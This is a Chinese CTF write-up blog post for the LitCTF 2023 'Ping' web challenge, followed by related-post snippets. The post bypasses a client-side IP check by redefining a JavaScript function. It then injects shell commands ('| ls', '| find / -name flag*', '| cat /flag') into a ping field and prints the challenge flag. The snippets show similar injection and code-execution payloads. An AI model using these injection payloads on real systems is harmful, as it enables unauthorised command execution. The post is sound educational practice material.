【CTF Web】NSSCTF 3873 [LitCTF 2023]Ping Writeup(RCE+Linux命令+前端绕过)

于 2024-05-21 09:55:57 发布
阅读量262 收藏 4
点赞数 8
分类专栏: CTF Writeup 文章标签: linux 运维 服务器 web安全 安全 网络安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/137998492
版权

[LitCTF 2023]Ping Writeup

看看能PING出什么
Flag形式 NSSCTF{}
出题人 Headlight

解法

试着Ping一下。原来是直接执行 ping 指令。

尝试发送:

| ls

会校验输入是否是 IP 地址。

查看源代码,原来是用 JavaScript 实现的。

如果校验通过就返回 true。

  function check_ip(){
    let ip = document.getElementById('command').value;
    let re = /^(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)$/;

    if(re.test(ip.trim())){
      return true;
    }
    alert('敢于尝试已经是很厉害了,如果是这样的话,就只能输入ip哦');
    return false;
  }

修改 check_ip 函数,让其直接返回 true。在控制台执行:

function check_ip() { return true; }

发送:

| ls

成功跳过校验。

找找 flag 在哪里。

| find / -name flag*

找到了。

让我看看!

| cat /flag

Flag

NSSCTF{6e554d11-1c64-4cb2-8413-24e5ded97bff}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
ctfshow-WEB-web12( 利用代码执行漏洞读取敏感文件)
热门推荐
wangyuxiang946的博客
09-06 1万+
ctf.show WEB模块第12关是一个代码执行漏洞, flag藏在根目录下的一个文件中, 读取文件内容接口过关 进入页面后, 只有一句话 where is the flag? 按照以往的经验, 线索肯定就藏在前端页面的源代码中 右键检查或者按F12, 进入开发者模式, 或者直接右键查看网页源代码, 源码的注释中提示了 cmd, 是在暗示我们利用代码执行漏洞 传入cmd参数, 验证一下代码执行漏洞 ?cmd=phpinfo(); 成功显示出php信息, 说明...
CTFSHOW系列-web12(信息收集-网站公开信息泄露)
siu~
11-24 616
CTFSHOW系列解题思路
[XCTF攻防世界]simple_php|baby_web|command_execution|xff_referer|simple_js|php_rce|Web_php_include|做题笔记
明裕学长的博客
03-17 149
所以,这里我们既要保证输出$a,$b,又要保证$b是数字,那么就用到php的弱类型比较了。之后使用127.0.0.1|cat ../../../home/flag.txt。发现会自动重定向到1.php说明有问题我们打开开发者工具中的网络看看。我们在ping中127.0.0.1|ls../../../home/发现index.php确实存在接着我们就看到了flag。如果$a等于0 and $a,输出$flag1。如果$b>1234,输出$flag2。发现包含了config.php。这题其实就是一个命令注入。
ctfshow-web10 with rollup 绕过
HAI_WD的博客
08-21 206
WITH ROLLUP是一种在SQL查询结果中使用的特殊子句,它可用于生成分组列的总计行。使用WITH ROLLUP,可以在查询结果中添加一个额外的行,显示分组结果的总计值。也就是说如果通过with rollup分组后为空,那我们的输入也为空,那么此时就可以进行绕过了。看到这个源码,可以看到只能是通过满足下面的条件来拿到flag,并且很多关键字都被拦截了。这里需要介绍一下WITH ROLLUP。这里还是使用/**/进行绕过空格。
CTFSHOW web入门——web10
m0_74093152的博客
02-05 228
CTFSHOWweb入门——web10
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
源码获取+ctf+web安全
10-08
源码获取,源码泄露+ctf+web安全
CTF资料web题型及其理论+misc日志分析
03-25
CTF资料web题型及其理论+misc日志分析
XCTF Web 新手区007:simple_php
立志成为最会敲代码的dancer,最会locking的程序猿
04-01 206
题目: WP: 本题考察PHP类型比较 附上php函数转化的形式 :即数字和字符混合的字符串转换为整数后只保留数字 <?php $str="123.9abc"; $int=intval($str); //转换后数值:123 $float=floatval($str); //转换后数值:123.9 $str=...
网络安全未来十年会很吃香吗?跟当年的Java开发比如何?
QXXXD的博客
02-02 813
网络安全入门到底是先学编程还是先学计算机基础?
CTFshow-web-web12
qq_68581192的博客
10-20 76
highlight_file()函数可以用于将一个PHP文件的代码高亮显示,并输出到页面上或者保存到文件中。利用burpsuite进行抓包,发现是get传参。glob()函数返回匹配指定模式的文件名或目录。glob(“.txt”)匹配以txt后缀的文件。我们使用高亮函数,将长的文件显示一下。我们将当前目录下的文件打印出,输入。php中有个函数glob();glob(“”)匹配任意文件。尝试远程代码执行,传入参数。查看源代码,发现有个提示。
ctf.show_web10
m0_56107268的博客
05-13 343
<?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if (!$con) { die('C.
ctfshow_web12
m0_72399197的博客
04-29 112
说明可以进行传参,先试试phpinfo,发现显示,说明cmd传参执行php命令,highlight_file()查看index.php源码,在用和php函数glob() 函数返回匹配指定模式的文件名或目录。执行命令,查找文件,发现*.php,查看文件内容是flag。glob(‘*.txt’)匹配以txt后缀的文件。进入页面后空白,点击查看源码:hit:cmd=glob(‘*’)匹配任意文件。
CTFshow 1-10关
weixin_62369433的博客
11-11 2123
CTFshow 1-10 通关详解
CTF.show:web12
qq_46230755的博客
01-15 363
右键查看源代码 有提示,试一下cmd=phpinfo(); 出现回显,采用glob通配符命令得到文件名 php的函数glob(); glob() 函数返回匹配指定模式的文件名或目录。 举个例子: glob("") 匹配任意文件 glob(".txt")匹配以txt为后缀的文件 有了这个方法我们先把当前目录下所有的文件找出来看看有没有可用的。 输入?cmd=print_r(glob("*"));打印出了如下文件 尝试进入那个很长的php文件 利用highlight_file函数 /?cmd=high
CTF show----web 解题笔记(web7~web10)
weixin_45908624的博客
01-05 582
ctfshow web7-web10
【网络安全】web漏洞-xml外部实体注入(XXE)
最新发布
A1_3_9_7的博客
12-28 1016
xml可拓展标记语言:xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
ctf web rce
10-17
我理解您的问题是关于 CTF 竞赛中 Web 漏洞中的 RCE(Remote Code Execution)的问题。RCE 是指攻击者可以通过漏洞执行任意代码,从而控制受害者的计算机系统。在 Web 漏洞中,常见的 RCE 漏洞包括但不限于命令注入、文件上传漏洞等。 对于命令注入漏洞,攻击者可以通过在输入框中注入恶意命令,从而执行任意代码。例如,在 Linux 系统中,攻击者可以通过注入 `;` 或 `&&` 等符号来执行任意命令。而在 Windows 系统中,攻击者可以通过注入 `|` 或 `&` 等符号来执行任意命令。 对于文件上传漏洞,攻击者可以通过上传恶意文件来执行任意代码。例如,攻击者可以上传一个包含恶意代码的 PHP 文件,并在 Web 服务器上执行该文件,从而实现远程代码执行。 为了防止 RCE 漏洞的发生,开发人员应该对用户输入进行严格的过滤和验证,并使用安全的编程语言和框架来开发 Web 应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值